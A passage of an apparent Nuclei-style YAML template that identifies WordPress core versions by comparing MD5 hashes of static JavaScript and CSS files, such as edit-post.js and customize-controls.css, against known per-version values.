== md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9f8a90c453ec305769a851ceba7e13b5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8fa847b3101bc6a314bad8945e882caf\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"23ea18a6eb1d90eac261e4a1b9353d95\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"32278bfa99cf6275086c9adb6404df34\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"617bad9e838b5d8ff1a6694a2c2cf79a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4ef66dffa334e595d9c36c77013039ec\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"d58d3bec2d7c08206d637707aaf23b71\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0abc3e469a077baf5d6a3adf7a223295\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"650410205bebd7b94622f81e6da5bf2e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9d35d5641379dbc4ccdf4e78b00d7436\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f1e978748cb955c6753663d5eb74e6e9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"bb7cbbb0b68e21bbf842631abc0b2af7\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"11c448411266aa8be98a3ec1243342aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/edit-post.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"30484efddfcec29a589a630010742218\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"7c48d5f4807fa10ccb77202a44491a9a\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"7423dbf596bd505ff600ab11c69d15c2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b0d65703decbc306b9d81b05a8625fce\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"049c4a73407e96192a0ac3cc896a4de5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e6dfa21e9e682ef48457d5082eef65af\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"eef17b9afdaa6b821a520587b3957583\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"91bc264d134052313dacb207c1d54647\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0c84a5b42fec684279dea617a6ea0936\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/viewport.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"8335564ab57cab0c2143177a750d4c4e\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"513302ca4e7e577e9d12033577e7e6f3\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"d7932636c66dd528dc7fd98caa7a607e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"bd8ff8373b15e52155cdef385a5cb9b3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f644859508f334d4ff334de7f0ba9291\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ac4c0b7c50ac3513ccbf3f444f225b94\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"313d6768fa95fa9606e08d85065f0ccc\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6b8fd78e47bd18e4ea42a7b16c41773b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a557d591281154e3e7d3858ceebdc041\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/edit-post.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"e8b57bb2a220a0add16fd29153bc2c62\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"b8a4b45d991460d09f63361df8cece80\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"3a8f886d748dd1bc6390f29b8b1cc909\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6205cc50d16c3911195c4ba650eae2a5\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4d75a79aec7e44bd8e9ecb609af8ef0b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"401d4d2ca31482d7008b546483ce4ed7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7ac36a48ae712d480e11fdc9a45b193c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9620f0a72d8c82019c7ec8a45dd14f92\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"22419332501f620be339216513af3f5f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/viewport.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"b8808c497f7a393dfefb7e247a5c1a40\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"d0f03f46b2a5b0eafc7db072cd7a9c1d\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"ea43d42792f43b764449b2618693c069\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"050d9ddb1870241ee572b50a8f718f16\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"c52145ba03290a6899622dc4eb31678b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"450867328ab4ca0027028349b98f8f2d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4e6323f06991ccefbecef6253bdcb300\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"60164c2e1e043a1f0f0304a5edf0942f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f72ebda44f55cf1d4237186a74376616\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"b8e01a2dfd278d083558d9ebad4f77c6\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"c79f42c5df39a520784f0356855a6b8b\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"ab6108c21a2a1d14df1dc9f0d49827d7\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"ac76ed468d7b90a9673e680791195b8e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b93a5427eac05dc8585499cbdd0c8a52\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0da91195d40246d5b6db07d553261811\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"dd3890418f907e7baba2bda1785c40c6\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3c1f461558424e961dc67ca2b475bc38\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7172fa59fb104710f7394a2350a2c884\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"9fc37d757ecb84cd959eee49871c3108\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"4156647efce226809d062e7463a445a5\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"c16f103ecb87682ba3b40546bd0568ed\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e23036d48e0637be779f9f6ae13dbdb7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"2446562857ed21bae441500b23199a89\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f46af19986f894a47409cd04a90e827e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1043ed2681ceedc0263257325bafedde\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"256ed4469caf485d0b740722a00d220b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"03658ccc962f96ad1f01cde772821212\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"e850d443575b1d311f75c731c61dde14\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"9c04504d1b70332284c7c83425a7742d\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"318c49f14d9f92f62bb45641cb3f9eb5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"9c72b817e54dfe7080be40b6228ac124\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"1b1f9ac48af85e1f98f078c7319a89a0\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"590bc741b3d9aeb5bc9f56b1aeaf6d52\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"1a1d016d4f1a1639a25c77b3f8c52615\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"183493ffd9bb469e92882434bb95f33c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1b074dccc9c4633fdbae077022442b88\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"950f64525286dae50d272b854cdf75d5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ec55b9cd3fe27496afa458f46fefa6d3\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"751fe5c25fde6b4d3cbeadd98997c531\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"dfa6a9415541755284ed912ba66a47ba\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"393618e58a1aa37bc09cdef0ec54efb1\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"17bcc2c784960eece3c2447f28a66e58\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4ea233ee70cb4a4630b7f886d19c2274\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"517ab56b0d531c6967cac1e0907dc5fa\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"55315f15e1e817ca3facd5ab6c18a4ee\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1174ee5ac6181aca57cc6917e2b36075\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"e30255f4c7fea5413bcbf6181939bfbf\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"14f89cdca922d61b3ff683e5d627a025\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"94b9ad8dc1d37141fc0e27d256c50f86\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c18783da8db701a5cd308b6a3530563b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"99c9ad00cc0ea455e2c55d1870e5bf73\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"8ae6ce2f95b8413264c6d072b909c620\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"c248a66d772f94a0476323e4d0515d15\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"1d8632e98daf0718d1b0998b432d48cc\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e971354e52f09076124ee678685ba35d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6467380d6762f4bc5a86477a14b7dc4b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6ced0e37584c576effbc70c359d93acb\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"78f7aa6798d9b73385777e885e281438\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f94aad7c60a799b4bf28b0e6ea0b0134\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"58091ac7639e586774b32895a7072e82\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"0a4145917ffe575d9772f4bf3b77fe89\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6513e6580dd660824811aa7cf3420e54\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"7a40853c2c0e6cd539b666e46344b442\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"ad658adc879ba1db73141c9fa0b5c67d\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"86643ddd4df5737bd4590b16820edba7\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"2638c252972dda9814c5b7dfc1cc082c\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"1dddd9f80d54d907aa929e5961b6f623\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3364a10ed6cf2020afca1aa446e3651a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a54850465f93f8b38c578f3d71fa2f81\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"06fbad1b88d31e111f1017966c27bd69\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"8c5c74220ca4d13347c89a0533cd3cff\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"56845933fa75808c849409235ad4766f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0753b59c6807bc3423580a933cc96b5e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"efa336b5c252dc3db265c403b03a55e6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2098c6561d5f3d6993b4eae437b87ab2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"005467044196b65cc61059a99d78c462\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"2bd099c199b51a2a222d0c87b8a791fa\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"9ca2f97b97f33e072814772948ad051a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"07dd5ae0a8c519df86710b774937a1f5\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"884c2b6847465f6d6fc5c935b73bb65a\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"5f006e699026ed8e27eaa1e3718cbacb\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"2c67af9db85d688107d3f55599929ae1\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1d0e5ded99e0c19c6deab1602412ad4d\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1010da3327f8dcd8528c2bfd3ef0d962\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"09dbbe1689c1c4fc968e66c13bf20ac4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"3f812ade9d1e4db4ccad691f78c0ef55\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"5cbdf14d7f60ad0eaecc133f000e299b\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"d7feb34b845f1fa5530a4c51d27bdab1\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"8d95686d540ea30f55dd8e2e722a25a3\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"2e0df4fceb8e32ab27b0d2c5572409b0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"0d28e5955c3270df8748ab67de079876\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9773dbbd9d575e3a0e0fc860a0e55d40\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d41557432736706066231f14c90effcf\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"21463e25a8cf85c82d861b2dec55238c\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"7ce7c610de77f1ad665964c41eb139ba\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"1fa7eb851c90dcc8a36840e23a715e00\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"2efb4f2640d7d938eb77a9772def851b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9026be550edce0f7bacc680d1a557ba2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6e1661adcd2e83ce04cf3d92987ee133\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/list-tables-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"703a6a20853140742564c197783d7574\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"52a6fde74e83e084947136f3028155ca\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"0e7d66c60fbc28b402c9360860a50db8\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"22bfd8378a0b60880169467965fd20f8\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8af5643dc6458748de289b840a9916e5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8396a236d1272256386e272432393aa6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"559f9973411a9ffe7bfd93098392f82b\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"8d4a4692e68a588b456cf537bac52fb2\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"cb2e1d966b121d6b85775afab729a54a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"67d4038d41230db98678ddac36aa9239\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"ecf0ee06d97aef62adea7ba425ae7bee\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0595bfc9b92f7a1e6357f6bec592451f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/list-tables.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"1979a03e73de2bfe8aa90aad9ffd6073\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"1f20713b071e4fded3ca44cdc67e50c2\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2a60bc6c16ed60d55fbb0dc830a7937f\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"55ae1e5716c2f3ef882b6b8736f04e09\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6a1898eda2575feefd20d8817a81610a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"67c654457315f92d37621b68103aa4e2\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d0dc73dd54483a2fc4a1829b708df6b1\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"01f906ac3c792ad50368c3792bc1b913\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"34e87e0a7614057b453abd9373beeada\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4443d19726d6c22f43a67891fc5748e0\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e9fc2b01496fd5fce09fbd8882e91e25\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2afbaaba8864509a66b1b8ed0e31aab3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"ffafa3ca2a96904b59497dcd6e8d6c9a\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"ba5daf07137183c4710352df09d941f3\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"cdf5f4bb049f63d0c102eefe106595e5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"d392c6caa0721b1787e24bf1250167b7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"13d08a48b4ba814727ff90025d96572a\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8a21a7e3cfb4d242c84b45135fc62072\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ea3c70b45147963bb9bc33c09003abd2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"27d9de08d110062db4c26b9fea3b21cc\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"633a6048309a6e23d4dedd9e62e65278\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"5651f0c5eb694d2d3aa9c1b3daa748fb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"0fe38cfa9155e6f0ed9734b05dfd3710\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1744d3c0da9ff689de20f91d783a84c1\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"6a01df682595d7c10ce1380a2faeab21\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"d919280b466eeb955ee3fe2bf88eac7c\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"cfecd2c2ab963773152a1366c81a1865\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"598c9f8efe6f61407ff4b43bd01d3139\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"314978fac5db55469bc5810682ca1827\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1595a6d7573e1ef0436a9fd704f40942\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bbfad9e11ad15bf8bdf05eac0c2c13d1\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f17bdc34919d5439aec151bf8b430dd0\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"ad52cf5c1455ee32967bfcbef32f0900\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d5897b7031f90ae5e785dcb7a72f7ad6\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4b55fe3a2ab991f1f94af8178a78f17b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"19815334f12156cdd1f1e44e1e053b7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-api.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"9c031b4273a40cc1ff0b80be3d4723ca\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.8 - dsl: - - "(\"fd75984f189d0a308e7f0fc70436e4eb\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.4 - dsl: - - "(\"3b8c124f3009a102041cb7cc70474ed8\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"4cca1500e61bd40abe7b543fd76a5a06\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"2933e0915238937a85a3a6730a6959da\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"47fa0460e792c6f65c4321c66a02ed42\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"1b243f90dc8ec0cdb34d36d3cb92dcba\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"a035f4ac1a1b03b0221e038d9aea637e\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"4a2494492cfb02a215d3a171ee869028\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"66cd16f6c18c7dd52b5b7d2f38afef6e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4c8b30fef77ad9532c3e38f7f578049e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"40bb4259dd66a68462fa6232af6cd0b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"5223a4aba4cb80d393eae23c3ac03847\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"301312307914214b7a5a7bdae880a395\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.3 - dsl: - - "(\"bf33fe1e46d08e362ea08a9cff9c428a\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"f47ee453000230a6e509e5eb09d21b53\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"4ef4d5630b4d01f400c1d2bf614aaae5\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"debbb450201d4f8b9d8097eb5d2f4984\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7ac52f23f1a20c60ac3bd890e2a9ef5b\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"8a91eaac386e7d441d9041a3fcce3551\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.1 - dsl: - - "(\"bb16ef190fbd8dc23da6275b186e8ee3\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"bef30601a17af3a107320f36b63ad35c\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"1bf381b227fd0f82983f7f42bfee09e2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6f447f8805670fe9f8af96001a9e2e6e\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"891c337677bb836662e8301d9be94544\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"24f60068c92a427fb866616ab3d50b45\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4b678d3cd57cec4d2e58abf0753dd5f8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"75d679e763f75d392154374ed55b4745\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"e0a81847317281768696a4235ae81a9b\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"7e9ec40c4bbfad6d8639bae47dc20971\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"23dad8691685cbf1e30c00812a03c20b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c7e4b9ae15ba4cf51bcf2915d00c1bca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"e49bd1a6378d486ab9dfd8ee73e5c185\" == md5(body))" - - type: dsl - name: 5.4.1 - 